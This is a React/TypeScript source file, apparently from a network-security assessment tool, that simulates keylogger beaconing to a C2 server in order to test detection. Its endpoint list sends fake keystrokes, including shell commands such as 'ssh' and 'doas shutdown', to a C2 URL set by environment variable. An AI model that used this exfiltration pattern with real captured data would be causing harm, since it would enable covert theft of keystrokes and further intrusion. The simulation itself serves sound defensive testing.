import React, { Fragment } from 'react';

import { AssessmentListing, KillChain } from '../../models/Assessment';
import { doIntervalAssessment } from '../helpers';
import media from '../../assets/KeyloggerCommunications.jpg';

const endpoints = [
  `${process.env.REACT_APP_C2_05}/key/send.php?host=na28482&win=root%40localhost%3A%7E&keys=unmae+%2Da&time=<time>`,
  `${process.env.REACT_APP_C2_05}/key/send.php?host=na28482&win=root%40localhost%3A%7E&keys=uname&time=<time>`,
  `${process.env.REACT_APP_C2_05}/key/send.php?host=na28482&win=root%40localhost%3A%7E&keys=a&time=<time>`,
  `${process.env.REACT_APP_C2_05}/key/send.php?host=na28482&win=root%40localhost%3A%7E&keys=uname+%2Da&time=<time>`,
  `${process.env.REACT_APP_C2_05}/key/send.php?host=na28482&win=root%40localhost%3A%7E&keys=ssh+100%2E100%2E100%2E51&time=<time>`,
  `${process.env.REACT_APP_C2_05}/key/send.php?host=na28482&win=root%40localhost%3A%7E&keys=doas+shutdown+%2Dph+now&time=<time>`,
  `${process.env.REACT_APP_C2_05}/key/send.php?host=na28482&win=root%40localhost%3A%7E&keys=mount&time=<time>`,
  `${process.env.REACT_APP_C2_05}/key/send.php?host=na28482&win=root%40localhost%3A%7E&keys=fdisk+%2DL&time=<time>`,
  `${process.env.REACT_APP_C2_05}/key/send.php?host=na28482&win=root%40localhost%3A%7E&keys=dmesg+%7C+egrep+%27wd%7Csd%27&time=<time>`,
  `${process.env.REACT_APP_C2_05}/key/send.php?host=na28482&win=root%40localhost%3A%7E&keys=mount&time=<time>`,
  `${process.env.REACT_APP_C2_05}/key/send.php?host=na28482&win=root%40localhost%3A%7E&keys=man+disklabel&time=<time>`
];

const assessment: AssessmentListing = {
  category: KillChain.C2,
  name: 'Keylogger Communications',
  media,
  priority: Infinity, // this test is slow, start it first
  longDesc: (
    <Fragment>
      <p>This test periodically sends keylogger data to a C2 server via HTTPS.</p>
      <ul>
        <li>IronNet does not collect any key presses or send any private data during this test.</li>
      </ul>
    </Fragment>
  ),
  shortDesc:
    'This test simulates the periodic sending of keylogger output over the encrypted HTTPS protocol.',
  characteristics:
    'HTTPS connections are periodically created and used to send malware tasking commands and responses.',
  warnings: {
    ironnet: ['Periodically transmit simulated keylog data to our C2 server via HTTPS.'],
    attacker: [
      'Record a user’s keystrokes and periodically send this sensitive data to an external server.',
      'Use data transferred in this way to plan and perform further intrusions on the internal network, or other companies’ networks.'
    ]
  },
  why:
    'Adversaries that want persistent access to a target network often have their installed malware periodically beacon to their C2 infrastructure for updated tasking, data exfiltration (keylogger), or as a simple heartbeat to maintain connectivity. One such example is using a periodic HTTPS connection to establish a C2 communications channel. These communications can often be difficult to detect since they use normal protocols and can easily evade signatures. Identifying these communications is critical to discovering malware in your network.',
  how:
    'IronDefense can identify periodic beaconing activity with periodicity ranging from seconds (smash and grab) to days (low and slow).  While that’s important, it’s more important that the IronDefense Expert System can differentiate between benign beaconing activity to common websites and beaconing to likely malicious sites to identify threats in your network.',
  doAssessment: () => doIntervalAssessment({ endpoints, method: 'POST', interval: 11000 })
};

export default assessment;
